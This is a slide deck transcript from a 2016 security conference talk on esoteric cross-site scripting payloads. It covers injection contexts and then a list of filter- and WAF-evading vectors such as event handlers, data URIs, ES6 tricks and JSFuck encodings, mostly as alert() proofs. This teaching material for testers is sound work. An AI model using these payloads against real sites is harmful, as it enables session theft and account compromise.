The document discusses advanced XSS (Cross-Site Scripting) payloads and their contexts, highlighting the impact of user input based on the interpretation context within a browser. It covers various common injection vectors, including HTML context, script context, and new HTML elements that may present security vulnerabilities. Additionally, it introduces the concept of jsfuck, an educational programming style that utilizes minimal JavaScript characters to execute code.

1. ESOTERIC XSS
PAYLOADS
c0c0n2016
@riyazwalikar
@wincmdfu

2. RIYAZ WALIKAR
Chief Offensive Security Officer @Appsecco
Security evangelist, leader for null Bangalore and OWASP
chapters
Trainer/Speaker : BlackHat, defcon, nullcon, c0c0n,
OWASP AppSec USA
Twitter : @riyazwalikar and @wincmdfu
http://ibreak.so ware

3. WHAT IS THIS TALK ABOUT?
Quick contexts
Uncommon XSS vectors

4. WHAT ARE INJECTION CONTEXTS?
Just like the word 'date' could mean a fruit,
a point in time or a romantic meeting
based on the context in which it appears,
the impact that user input appearing in the
page would depend on the context in which
the browser tries to interpret the user input.
Lavakumar Kuppan, IronWASP

5. 3 MOST COMMON INJECTION CONTEXTS
HTML context
HTML Element context
Script context

6. HTML CONTEXT
<html>
<body>
Welcome user_tainted_input!
</body>
</html>

7. HTML ELEMENT CONTEXT
<html>
<body>
Welcome bob!
<input id="user" name="user" value=user_tainted_input>
</body>
</html>

8. SCRIPT CONTEXT
<html>
<body>
Welcome bob!
<script>
var a = user_tainted_input;
</script>
</body>
</html>

10. Common vectors?
<script> </script>alert(document.cookie)
<svg onload=alert(document.cookie)>
<input onfocus=alert(document.cookie) autofocus>

11. Multiple ways of representation
document.cookie
document['cookie']
document['coo'+'kie']
eval('doc'+'ument')['coo'+ 'kie']

12. Autoscrolling the page
<body onscroll=alert(1)>
<br>
<br>
<br>
<br>
<br>
<br>
...
<br>
<br>
<br>
<br>
<br>
<input autofocus>

13. New HTML Elements
<video><source onerror="alert(1)">
<details open ontoggle="alert(1)"> <!­­ Chrome only ­­>

14. Using the CDATA section inside SVG
<svg>
<img src=xx:x onerror=alert(2)//"></svg>
<![CDATA[><image xlink:href="]]>

15. Using DATA URIs
<object data="data:text/html;base64,
PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
<embed src="data:text/html;base64,
PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></embed>

16. Using the embed tag
<embed src="javascript:alert(1)"></embed>

17. Overwriting the ReferenceError object
<script>
</script>
ReferenceError.prototype.__defineGetter__('name', function()
{alert(1)}),x

18. ES6 Computed properties
({[alert(1)]: 1})
({[eval('ale'+'rt')(0)]: 1 })

19. Back ticks FTW!
No enclosing brackets required:
alert `1`
Expansion of u{61} and backticks
locu{61}tion=ju{61}vascript:alert`1`

20. Prototyping the .toString() method
Object.prototype[Symbol.toStringTag]='<img src=1 onerror=alert(0)>';
location='javascript:1+{}'

21. JSFUCK
JSFuck is an esoteric and educational programming style
based on the atomic parts of JavaScript. It uses only six
different characters to write and execute code - ()+[]!
false => ![]
true => !![]
undefined => [][[]]
NaN => +[![]]
0 => +[]
1 => +!+[]
2 => !+[]+!+[]
10 => [+!+[]]+[+[]]
Array => []
Number => +[]
String => []+[]
Boolean => ![]
Function => []["filter"]
eval => []["filter"]["constructor"]( CODE )()
window => []["filter"]["constructor"]("return this")()

22. alert(0)
(![]+[])[1]+(![]+[])[2]+(![]+[])[4]+(!![]+[])[1]+(!![]+[])[0]+"(0)"

25. The ES6 specification coupled with new HTML 5 elements
and event handlers can be used to bypass most blacklist
based web application firewalls.
A lot of active research has been done in this area by
@0x6D6172696F and the good folks at cure53

26. Q & A
@riyazwalikar
@wincmdfu
http://ibreak.so ware

27. REFERENCES:
http://blog.ironwasp.org/2014/07/contexts-and-cross-
site-scripting-brief.html
https://github.com/riyazwalikar/simplexssapp
https://html5sec.org/
http://www.jsfuck.com/
http://blog.innerht.ml/cascading-style-scripting
https://cure53.de/es6-for-penetration-testers.pdf